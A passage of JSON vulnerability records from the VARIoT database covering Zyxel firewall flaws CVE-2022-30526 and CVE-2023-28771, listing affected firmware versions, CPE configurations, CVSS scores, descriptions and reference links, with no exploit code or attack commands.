                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg20-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg20-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_2200-vpn_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_2200-vpn:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_110_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_110:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_310_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_310:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:zywall_1100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "5.30",
                        "versionStartIncluding": "4.30",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:zywall_1100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg40w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg40w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg60w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndIncluding": "4.72",
                        "versionStartIncluding": "4.09",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg60w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "jbaines-r7",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2022-30526",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "LOCAL",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 7.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 1.8,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 2.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Local",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 7.8,
                "baseSeverity": "High",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-30526",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "Low",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2022-30526",
                "trust": 1.8,
                "value": "HIGH"
              },
              {
                "author": "security@zyxel.com.tw",
                "id": "CVE-2022-30526",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202207-1612",
                "trust": 0.6,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device. ZyXEL The product contains a vulnerability in permission management.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30526"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-30526",
            "trust": 3.3
          },
          {
            "db": "PACKETSTORM",
            "id": "168202",
            "trust": 2.4
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684",
            "trust": 0.8
          },
          {
            "db": "CXSECURITY",
            "id": "WLB-2022080075",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-30526",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30526"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "id": "VAR-202207-1298",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.2867630485714286
      },
      "last_update_date": "2023-12-18T13:59:38.633000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Zyxel USG FLEX Security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=201959"
          }
        ],
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-269",
            "trust": 1.0
          },
          {
            "problemtype": "Improper authority management (CWE-269) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.0,
            "url": "http://packetstormsecurity.com/files/168202/zyxel-firewall-suid-binary-privilege-escalation.html"
          },
          {
            "trust": 2.5,
            "url": "https://www.zyxel.com/support/zyxel-security-advisory-authenticated-directory-traversal-vulnerabilities-of-firewalls.shtml"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30526"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/issue/wlb-2022080075"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-30526/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30526"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2022-30526"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-07-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-30526"
          },
          {
            "date": "2023-09-11T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "date": "2022-07-19T06:15:08.827000",
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "date": "2022-07-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-07-19T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-30526"
          },
          {
            "date": "2023-09-11T08:17:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          },
          {
            "date": "2022-12-13T15:38:54.443000",
            "db": "NVD",
            "id": "CVE-2022-30526"
          },
          {
            "date": "2022-09-01T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0ZyXEL\u00a0 Product permission management vulnerabilities",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-013684"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "other",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202207-1612"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202304-2073

    Vulnerability from variot - Updated: 2023-12-18 13:59

    Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202304-2073",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "usg flex 100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 50w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "zywall usg 100",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "atp700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 500",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall usg 310",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 500",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall usg 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn300",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp100w",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn300",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall usg 310",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn1000",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "zywall usg 100",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 700",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn100",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn1000",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "vpn50",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "atp800",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "vpn50",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp800",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 50w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "usg flex 700",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "usg flex 200",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.36"
          },
          {
            "model": "zywall usg 310",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.73"
          },
          {
            "model": "usg flex 200",
            "scope": "gte",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "4.60"
          },
          {
            "model": "atp100w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "zyxel",
            "version": "5.35"
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2023-28771"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.35",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp200:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp500_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp500:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp700_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp700:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:atp800_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:atp800:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_100w_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:zyxel:usg_flex_100w:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:zyxel:usg_flex_200_firmware:*:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "versionEndExcluding": "5.36",
                        "versionStartIncluding": "4.60",
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
